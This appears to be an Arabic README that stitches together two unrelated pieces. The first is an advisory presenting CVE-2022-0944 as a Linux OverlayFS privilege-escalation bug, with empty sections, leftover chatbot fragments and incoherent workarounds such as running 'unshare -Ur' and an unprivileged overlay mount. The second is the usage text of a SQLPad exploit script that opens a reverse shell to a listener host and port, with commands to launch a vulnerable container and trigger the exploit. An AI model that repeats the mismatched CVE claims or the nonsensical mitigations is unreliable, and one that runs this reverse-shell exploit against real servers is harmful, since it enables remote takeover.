
دليل استغلال وتخفيف لـ CVE-2022-0944، وهي ثغرة تصعيد صلاحيات في نواة لينكس ضمن OverlayFS، مع سكريبتات كشف وتعليمات التصحيح.
إرشادات أمنية ودليل تخفيف لثغرة تصعيد الامتيازات في نواة لينكس في OverlayFS.
CVE-2022-0944 هي ثغرة أمنية في نظام OverlayFS الفرعي لنواة لينكس تسمح للمهاجمين المحليين بتصعيد الامتيازات من خلال معالجة غير صحيحة لإنشاء الملفات في تكوينات محددة.

🚨 التأثير
يمكن للمهاجم المحلي:
🔍 الكشف
grep CVE-2022-0944 /var/log/apt/history.log
# For RHEL/CentOS:
rpm -q --changelog kernel | grep CVE-2022-0944
4. 🛡️ التخفيف
التصحيحات الرسمية
التحديث إلى أحد هذه الإصدارات المصححة:
نواة لينكس 5.16.12 أو أحدث
تصحيحات مرتجعة خاصة بالبائعين
أمر التحديث:
sudo apt update && sudo apt upgrade linux-image-$(uname -r)
sudo yum update kernel
حلول بديلة (إذا لم يكن التصحيح فوريًا)
تقييد استخدام OverlayFS:
sudo modprobe -r overlay
تنفيذ قيود مساحة الأسماء:
# Create unprivileged user namespace
unshare -Ur
# Mount with user restrictions
mount -t overlay -o lowerdir=/lower,upperdir=/upper,workdir=/work overlay /mnt
تطبيق سياسات SELinux/AppArmor: type=AVC msg=audit(1647452829.123:456): user pid=1234 comm="mount" scontext=user_u:user_r:user_t tcontext=system_u:object_r:unlabeled_t denied { mounton }
⚠️ إخلاء مسؤولية تم تقديم هذا المستند لأغراض إعلامية فقط. على الرغم من بذل الجهود لضمان الدقة، إلا أنه لا يتم تقديم أي ضمان. اختبر التصحيحات دائمًا في بيئة تطوير قبل النشر في الإنتاج.
آخر تحديث: 2023-10-01 | عرض سجل التغييرات
الميزات الرئيسية:
تنسيق ملف README هذا مناسب لـ:
هل تود أن:
usage: main.py [-h] url lhost lport [username] [password]
positional arguments:
url URL to SQLPad
lhost Listener host address for reverse shell
lport Listener port for reverse shell
username login username (optional)
password login password (optional)
options:
-h, --help show this help message and exit
مثال:
# install requirements
pip install -r requirements.txt
# start sqlpad docker container
docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:6.10.0
# trigger exploit
./main.py http://localhost:3000 127.0.0.1 1337 admin admin
يحتوي هذا المستودع على أكواد وأدوات مخصصة للأغراض التعليمية فقط، وتحديدًا للاستخدام في دورات الأمن السيبراني وبيئات التعلم. لا يتحمل مؤلف هذا الرمز أي مسؤولية عن أي عواقب ناتجة عن استخدام أو إساءة استخدام أو تعديل هذا الرمز. يتم توفير الرمز "كما هو" دون أي ضمان، صريح أو ضمني، بما في ذلك على سبيل المثال لا الحصر الضمانات الضمنية للقابلية للتسويق أو الملاءمة لغرض معين.